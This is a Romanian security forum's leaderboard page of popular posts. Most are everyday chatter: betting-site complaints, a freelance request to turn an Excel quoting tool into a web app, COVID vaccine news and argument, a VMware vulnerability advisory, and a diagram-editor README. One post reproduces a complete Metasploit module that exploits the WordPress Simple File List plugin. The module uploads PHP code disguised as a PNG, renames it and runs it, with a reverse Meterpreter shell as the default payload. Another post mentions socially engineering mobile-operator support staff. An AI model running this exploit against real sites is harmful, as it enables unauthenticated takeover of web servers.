Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 11/26/20 in all areas

  1. Am zis sa incerc si eu superbetul...Mi-a dat eroare cand am incercat sa pun 2 bilete, ambele de cate 10 lei. Banii i-a scazut din total si daca ma duc la istoric pariuri imi arata un singur bilet, de 20 lei, cu data corecta (acum 5 min), si daca dau pe el sa vad ce naiba s-a plasat imi zice ca e mai vechi de 3 luni si nu mai pot vedea detaliile. Minunat
    2 points
  2. Incerc sa explic cat mai bine prin poze. 1. La munca ma ocup cu ofertare si devize pentru izolarea caselor. Ca sa-mi usurez munca am facut eu un "program" in excel de calcul si generare de devize, oferte si contracte. Interfata: In partea de materiale si servicii am materialele si serviciile folosite la o lucrare. Ele se regasesc in Tabul "preturi" si in interfata le aleg cu dropdown (avand mai multe tipuri de folie, band etc. cu diferite preturi). Cum procedez sa aflu un pret pentru o lucrare: - aleg materialele si serviciile aferente acelei lucrari, densitatea, grosimea pe care se face izolatia, suprafata de izolat, manopera, deplasare, numar de muncitori, zile, % pierdere folie, banda, am niste reguli si pt capse, petece, banda de imbinare (cat se consuma pe mp). Dupa ce introduc toate aceste date am rezultatele de mai jos: - nr de saci necesari pentru lucrare(cantitatea in kg / 15 kg cat are un sac), mc material, pret in lei si in euro (folosesc cursul bnr care se actualizeaza singur cand deschid fisierul), profit, cheltuieli, impozit etc... In partea de jos am - Oferta - Deviz, unde introduc datele manual necesare pentru generarea devizului si a contractului, nume, prenume, email etc.. Asa arata un deviz: care se completeaza automat in functie de ce este in interfata. Exista si un buton cu macro cand il apasam imi salva devizul ca pdf (prefer manual). Contractul in completez prin mail merge cu datele colectate pret, mp, adresa, avans, total, etc...(deschid wordul cu templateul de contract si se completeaza cu datele din tabul MailMerge.). Mai este tabul txt in care am partea asta de pe deviz cu etapele de executie (in functie de ce materiale si servicii aleg acel text se schimba) - poza 3. Tabul Txt: Ca sa explic mai bine trebuie exact pe fisier. 1.1. Interfata web Am incercat sa fac ceva eu cu un prieten cu Laravel dar ma depaseste. Ceva de genul vreau cu o baza de date pentru materiale si preturi. Tipurile de materiale care sunt 15 20 maxim. Si datele pentru devizele generate sa le salvez intr-o baza de date cu un search ca sa-mi fie usor sa identific o lucrare cu un pret (sa nu stau sa caut in toate pdf urile cum fac acum). Interfata de unde sa introduc datele si sa generez contact, deviz, oferta etc. In partea dreapta din interfata sa am rezultatele pret, profit, cheltuieli, impozit ... etc Cred ca am reusit sa descriu ce am acum si ce doresc. 2. Despre suma pot sa spun ca am un buget undeva la 100 - 150 euro. Folosim o platforma gen Fiverr .... ca sa raspund la restul de intrebari legate de garantie si plata. Sper ca am reusit sa explic cat de cat ok ce am nevoie. Multumesc @MrGrj pentru ajutor!
    2 points
  3. https://arhiblog.ro/actioneaza-vaccinurile-covid/ PS: Articolul respectiv nu va fi citit de prea multa lume. Si oricand am incerca, nu vom reusi. Oamenii sunt prosti. Adica pula mea, Youtube Trending: https://www.youtube.com/feed/trending Cam asta se cauta pe o platforma in care puteti gasi filmulete despre virusuri, vaccinuri sau chiar cum functioneaza o bomba nucleara. E mai usor de inteles Jador sau Tzanca Uraganul.
    2 points
  4. Am citit ce a postat @RazvanDC si am facut atac cerebral. Nu recomand. "30% din populatie are deja imunitate" "doar 7% din populatie are anticorpi" "sa nu vaccinam persoanele care sunt sanatoase" "sa vaccinam doar persoanele care nu s-au imbolnavit deja" Daca au imunitate 30% de ce nu au si anticorpi? sau au imunitate divina? Vaccinul nu e pt cei care nu sunt inca bolnavi, ca sa nu se imbolnaveasca? sau cum? dupa ce mori se face vaccin? "PCR poate ieși pozitiv atunci când cineva este infectat cu unul dintre aceste coronavirusuri reci" (asta e 100% fals pt oricine stie ce e ala pcr. Companiile care au ales primeri nu sunt cretine. Poti si tu sa verifici primeri pt coliziuni online) In limbaj de hacker e ca si cum ai zice ca SHA256 e slab pt ca exista mai multe parole cu acelasi hash, deci oricine iti poate accesa conturile. Eu nu zic ca tipul nu are dreptatea lui, dar ce scrie acolo nu face sens deloc. Pana la pastea cu antivax care e 99.9% fever dream
    2 points
  5. Nu am auzit niciodata si nici nu am avut probleme cu huse de tipul coperta pe telefoane. Incearca eventual o recalibrare si un factory reset sa excluzi orice posibilitate sa fie de la soft. Daca tot nu merge, trimite-l in service.
    1 point
  6. Eroare uriașă în cazul vaccinului anti-COVID-19. Participanții la studiu au primit o primă doză redusă la jumătate AstraZeneca și Universitatea Oxford au dezvăluit faptul că o eroare de fabricație, în cazul vaccinului anti-COVID-19, ar putea periclita rezultatele finale ale studiului. Unele doze de vaccin conțineau o concentrație mai mică decât celelalte, fapt ce a dus la vaccinarea diferită a voluntarilor. Astfel că, 2.741 de voluntari au primit o primă doză redusă la jumătate, pe când cea de-a doua a fost administrată în concentrație completă. Spre surprinderea cercetătorilor, participanții care au fost vaccinați cu doza mai redusă, au fost mai bine protejați, având o eficiență de 90%. Pe de altă parte, voluntarii vaccinați cu doza completă, au fost protejați mai puțin, observându-se o eficiență de 62%. În medie, eficiența vaccinului menit să protejeze împotriva COVID-19 este de 70%. Conform Adevărul, 8.895 de voluntari au fost vaccinați cu serul la concentrația stabilită. Luni, 23 noiembrie, au fost anunțate primele rezultate ale studiilor clinice pe voluntari din Marea Britanie și Brazilia, fiind estimată, în medie, o eficiență de 90%. De fapt, vaccinul dezvoltat de AstraZeneca în parteneriat cu universitatea Oxford are o eficiență medie de 70%, în ceea ce privește combaterea virusului SARS-CoV-2. În ce au constat studiile Studiile s-au concentrat pe testarea a două moduri de administrare, ambele constând în vaccinarea repetată. În conformitate cu rezultatele făcute public luni, s-a dovedit că vaccinul are o eficiență de 90%, pe când, inițial, este administrată o jumătate de doză, urmată de o doză completă la circa o lună distanță. Astfel, eficiența de 62% apare atunci când sunt administrate două doze complete la distanță de cel puțin o lună. Erorile descoperite nu au fost menționate de către companie, cu toate că a precizat că o parte din voluntari a primit prima doză redusă la jumătate. Un impact asupra acestor rezultate preliminare l-ar putea avea și vârsta participanților: persoanele din grupul cu doze mai mici sunt voluntari de până în 55 de ani. Acest fapt ar putea fi relevant în ceea ce privește eficiența mai mare a vaccinului, deoarece reacția imunitară este mai puternică în cazul persoanelor mai tinere, neconstituind un fapt major concentrația în sine. Datele anunțate de AstraZeneca sunt de natură să dezamăgească lumea ştiinţifică şi publicul larg. Testele extinse arată o eficienţă de doar 70%, în condiţiile în care companiile Pfizer şi Moderna au anunţat anterior că vaccinurile dezvoltate de aceste companii au o eficienţă de 95%. Vaccinul Moderna, eficiență de 94,5%! După un report preliminar, vaccinul dezvoltat de compania Moderna ar avea o eficienta de doar 94.5% din cazuri. Compania producătoare de medicamente Moderna a anunțat că vaccinul său anti-Covid-19 are o rată de succes de 94,5%, după ce a analizat datele preliminare ale studiului larg și încă în desfășurare, transmite New York Times. Cercetătorii au transmis că rezultatele sunt mai bune decât s-ar fi așteptat vreodată, însă vaccinul nu va putea fi disponibil pe piață timp de câteva luni. Moderna este a doua companie care a făcut publice datele preliminare despre un vaccin aparent de succes, oferind speranțe pentru încheierea pandemiei care a infectat 53 milioane oameni și a ucis peste 1,2 milioane. AstraZeneca si Oxford refuza reluarea testelor denumite "trials" AstraZeneca și Universitatea din Oxford apără rezultatele și metodele folosite în studiile lor de vaccin în faza a treia, pe baza criticilor experților din SUA, subliniind că au fost utilizate „cele mai înalte standarde” și că „vor fi efectuate analize suplimentare”. Pascal Soriot, CEO AstraZeneca, i-a confirmat joi Bloomberg că gigantul farmaceutic britanic ar putea efectua un studiu global suplimentar pentru a evalua eficacitatea vaccinului său Covid-19. Șeful operației Warp Speed a Casei Albe, Moncef Slaoui și alții din SUA și-au exprimat îngrijorarea cu privire la grupa de vârstă testată, spunând că eficacitatea de 90% a fost arătată doar pentru grupul cu risc scăzut, care număra 2.741 de persoane sub vârsta de 55 de ani. grup ale cărui rezultate au afișat 62% eficacitate în număr de 8.895. AstraZeneca s-a retras împotriva criticilor, subliniind monitorizarea studiului de către Consiliul extern de monitorizare a siguranței datelor (DSMB) și faptul că datele publicate luni au constituit simple rezultate intermediare și că ar urma mai multe date. "Studiile au fost efectuate la cele mai înalte standarde", a declarat joi un purtător de cuvânt al AstraZeneca. „Un comitet independent de monitorizare a siguranței DSMB supraveghează studiile pentru a asigura siguranța și calitatea. DSMB a stabilit că analiza și-a îndeplinit obiectivul primar, arătând protecția împotriva COVID-19 care au loc la 14 zile sau mai mult după administrarea a două doze de vaccin. ” „Se vor acumula mai multe date și se vor efectua analize suplimentare, rafinând citirea eficacității și stabilind durata protecției”, a spus purtătorul de cuvânt, relateaza CNBC. Critica deosebit de dură a venit de la banca de investiții din SUA în domeniul sănătății și biotehnologiei SVB Leerink, ai cărei analiști au scris luni: „Credem că acest produs nu va fi autorizat niciodată în SUA” „Această credință se bazează pe proiectarea studiilor esențiale ale companiei, care nu pare să corespundă cerințelor FDA pentru reprezentarea minorităților, a cazurilor severe, a persoanelor infectate anterior și a persoanelor în vârstă și a altor populații cu risc crescut”, a spus analiza. Sursa: https://www.cbc.ca/news/health/astrazeneca-oxford-vaccine-error-trial-results-1.5816852
    1 point
  7. am ceva timp liber weekendul asta, daca vrei cred ca il pot face pe laravel trimite mesaj daca esti interesat si designul nu e atit de important
    1 point
  8. VMware și-a avertizat clienții cu privire la o vulnerabilitate critică prezentă în mai multe dintre produsele sale, inclusiv Workspace One Access și Identity Manager, care ar putea permite hackerilor să preia controlul mașinilor vulnerabile. Defecțiunea bazata pe "code execution", urmărită ca CVE-2020-4006 și evaluată cu 9,1 pe scara de severitate a amenințărilor CVSS, poate fi exploatată într-o serie de produse VMware, a avertizat compania. În prezent nu există niciun patch disponibil, deși firma a emis o soluție care poate fi aplicată în unele cazuri. De asemenea, nu se menționează dacă defectul este exploatat activ în natură sau nu. Hackerii înarmați cu acces la rețea la configuratorul administrativ de pe portul 8443 și o parolă validă pentru contul de administrator pot exploata eroarea pentru a executa comenzi cu privilegii nerestricționate pe sistemul de operare (OS) subiacent. Serviciile afectate sunt: - VMware Workspace - Cloud Foundation, - vRealize Suite Lifecycle Manager. - Workspace One Access Connector, - One Access, VMware Workspace One Access 20.10 (Linux) VMware Workspace One Access 20.01 (Linux) - Identity Manager, VMware Identity Manager 3.3.1 up to 3.3.3 (Linux) - Identity Manager Connector, VMware Identity Manager Connector 3.3.2, 3.3.1 (Linux) VMware Identity Manager Connector 3.3.3, 3.3.2, 3.3.1 (Windows) Vulnerabilitatea poate fi exploatată în unele produse găzduite pe Linux, dar nu și pe Windows dar și în alte sisteme de operare. Detaliile complete despre configurațiile software și OS afectate sunt prezentate în recomandările de securitate ale VMware. Până la lansarea unui patch, VMware a prezentat o soluție care poate fi aplicată unor linii de produse, dar nu tuturor. Clienții care utilizează Workspace One Access, VMware Identity Manager și VMware Identity Manager Connector pot urma pașii detaliați prezentați aici, pentru configuratorul găzduit pe portul 8443. Aceasta implică executarea unui set de comenzi pentru toate produsele afectate. Soluția de soluționare nu este compatibilă cu alte produse dincolo de cele trei care ar putea fi afectate, iar clienții vor trebui să stea cu ochii deschiși pentru orice noutati despre un patch la momentul lansării unuia. Știrile despre această vulnerabilitate au sosit la doar câteva zile după ce VMware a confirmat două defecte critice în produsele sale ESXi, Workstation, Fusion și Cloud Foundation. Use-after-free vulnerability in XHCI USB controller (CVE-2020-4004)
    1 point
  9. quiver is a modern, graphical editor for commutative and pasting diagrams, capable of rendering high-quality diagrams for screen viewing, and exporting to LaTeX via tikz-cd. Creating and modifying diagrams with quiver is orders of magnitude faster than writing the equivalent LaTeX by hand and, with a little experience, competes with pen-and-paper. Try quiver out: q.uiver.app Features & screenshots quiver features an efficient, intuitive interface for creating complex commutative diagrams and pasting diagrams. It's easy to draw diagrams involving pullbacks and pushouts, adjunctions, and higher cells. Object placement is based on a flexible grid that resizes according to the size of the labels. There is a wide range of composable arrow styles. quiver is intended to look good for screenshots, as well as to export LaTeX that looks as close as possible to the original diagram. Diagrams may be created and modified using either the mouse, by clicking and dragging, or using the keyboard, with a complete set of keyboard shortcuts for performing any action. When you export diagrams to LaTeX, quiver will embed a link to the diagram, which will allow you to return to it later if you decide it needs to be modified, or to share it with others. Other features Multiple selection, making mass changes easy and fast. A history system, allowing you to undo/redo actions. Support for custom macro definitions: simply paste a URL corresponding to the file containing your \newcommands. Panning and zooming, for large diagrams. Smart label alignment and edge offset. Building Make sure you have installed yarn and have a version of make that supports .ONESHELL (e.g. GNU Make 3.82). Clone the repository, and run make which will build KaTeX. Then simply open src/index.html in your favourite web browser. If you have any problems building quiver, open an issue detailing the problem and I'll try to help. Thanks to S. C. Steenkamp , for helpful discussions regarding the aesthetic rendering of arrows. AndréC for the custom TikZ style for curves of a fixed height. Everyone who has improved quiver by reporting issues or suggesting improvements. Download quiver-master.zip or git clone https://github.com/varkor/quiver.git Source
    1 point
  10. This Metasploit module exploits WordPress Simple File List plugin versions prior to 4.2.3, which allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed to php and executed. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress Simple File List Unauthenticated Remote Code Execution', 'Description' => %q{ Simple File List (simple-file-list) plugin before 4.2.3 for WordPress allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed to php and executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'coiffeur', # initial discovery and PoC 'h00die', # msf module ], 'References' => [ [ 'URL', 'https://wpscan.com/vulnerability/10192' ], [ 'URL', 'https://www.cybersecurity-help.cz/vdb/SB2020042711' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list' ], [ 'EDB', '48349' ] ], 'Platform' => [ 'php' ], 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Default', { 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ] ], 'DisclosureDate' => '2020-04-27', 'DefaultTarget' => 0, 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), ] ) end def dir_path '/wp-content/uploads/simple-file-list/' end def upload_path '/wp-content/plugins/simple-file-list/ee-upload-engine.php' end def move_path '/wp-content/plugins/simple-file-list/ee-file-engine.php' end def upload(filename) print_status('Attempting to upload the PHP payload as a PNG file') now = Date.today.to_time.to_i.to_s data = Rex::MIME::Message.new data.add_part('1', nil, nil, 'form-data; name="eeSFL_ID"') data.add_part(dir_path, nil, nil, 'form-data; name="eeSFL_FileUploadDir"') data.add_part(now, nil, nil, 'form-data; name="eeSFL_Timestamp"') data.add_part(Digest::MD5.hexdigest("unique_salt#{now}"), nil, nil, 'form-data; name="eeSFL_Token"') data.add_part("#{payload.encoded}\n", 'image/png', nil, "form-data; name=\"file\"; filename=\"#{filename}.png\"") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, upload_path), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 # the server will respond with a 200, but if the timestamp and token dont match it wont give back SUCCESS as it failed fail_with(Failure::UnexpectedReply, "#{peer} - File failed to upload") unless res.body.include?('SUCCESS') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.png"), 'method' => 'GET' ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res # 404 could be AV got it or something similar fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}. File was uploaded successfully, but could not be found.") if res.code == 404 fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 print_good('PNG payload successfully uploaded') end def rename(filename) print_status("Attempting to rename #{filename}.png to #{filename}.php") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, move_path), 'method' => 'POST', 'vars_post' => { 'eeSFL_ID' => 1, 'eeFileOld' => "#{filename}.png", 'eeListFolder' => '/', 'eeFileAction' => "Rename|#{filename}.php" } ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 print_good("Successfully renamed #{filename}.png to #{filename}.php") end def check return CheckCode::Unknown unless wordpress_and_online? # check the plugin version from readme check_plugin_version_from_readme('simple-file-list', '4.2.3', '1.0.1') end def exploit # filename of the file to be uploaded/created filename = Rex::Text.rand_text_alphanumeric(8) register_file_for_cleanup("#{filename}.php") upload(filename) rename(filename) print_status('Triggering shell') send_request_cgi( 'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.php"), 'method' => 'GET' ) end end Source
    1 point
  11. Nu am citit articolul complet, insa de obicei "bombardierii cu bemveuri" se "combina" cu fetele operatoare dragute si,... au acces in sistem.
    1 point
  12. De obicei fac inginerie sociala pe cei de la support de la operatorul GSM, dar e probabil mai simplu asa, ca cei de la support sunt trainuiti pentru astfel de lucruri.
    1 point
  13. Hai sa iti explic putin cum sta treaba daca vrei sa gasesti pe cineva: 1. Descrie asa cum trebuie proiectul. 1.1 Ce fel de interfata? Web / Desktop / Command Line? 1.2 Cum arata excel-ul respectiv? Sunt mai multe sheets? E foarte mare fisierul? 1.3 Cum ai vrea sa arate "interfata" respectiva? 1.4 Ce legatura au PDF-ul si WORD-ul cu excelul? 2. Ce suma oferi pentru cele de mai sus? 2.1 Oferi un avans? 2.2 Garantezi ca vei plati developerul care iti va face acest proiect? 2.3 Daca garantezi, cum o faci? 2.4 Cum vei face plata? Daca oferi aceste detalii iti garantez ca se vor gasi oameni care te vor ajuta. Poate chiar si gratis, pentru portofoliu, daca e ceva rapid
    1 point
  14. Mai satisfacut decat un 69 Livram mai eficient decat Chlamydia Cu grija si delicatetea unei basini umede
    0 points
  15. Daca astepti ceva mai serios fii si tu la fel. Adica ofera putin context despre firma respectiva: are o nisa anume sau nu, zona de operare, care sunt principalii competitori, ce unique selling points ai, cam ce ai vrea sa ramana in capul unuia care il vede - un singur mesaj subliminal (ex daca ii folosesc pe astia sunt cei mai ieftini) si alte info relevante.
    0 points
  16. Ne miscam ca ochii mortului
    0 points
  17. Ceva exemple de facultati si cursuri care te atrag? Ce tara/i?
    0 points
  18. 1. 2. 3. Esti mai prost decat prevede legea 4. Se aplica "nu te pune cu mintea prostului ca e odihnita" 5. Multam pentru un ras sanatos
    0 points
  19. 0 points
  20. Am pariat €10 la plezneala pe bwin pe un meci care era 0-2 la pauza ca se va incheia 3-2. Avea cota 468 si mi-a iesit. Dupa m-au limitat bulangii la pariuri de €0.01. Facut complaint dar nu m-au bagat in seama. Macar am reusit sa scot banii...
    0 points
  21. @M4T3! la o platforma avem o arhitectura pentru 1 server de productie, unul de UAT si unul de DEV la Google Cloud. Au uptime 100% din 2017. Factura anuala era peste £100k. Iti dau datele de contact la Account Manager? #pulencurdecarevrei 😁
    0 points
×
×
  • Create New...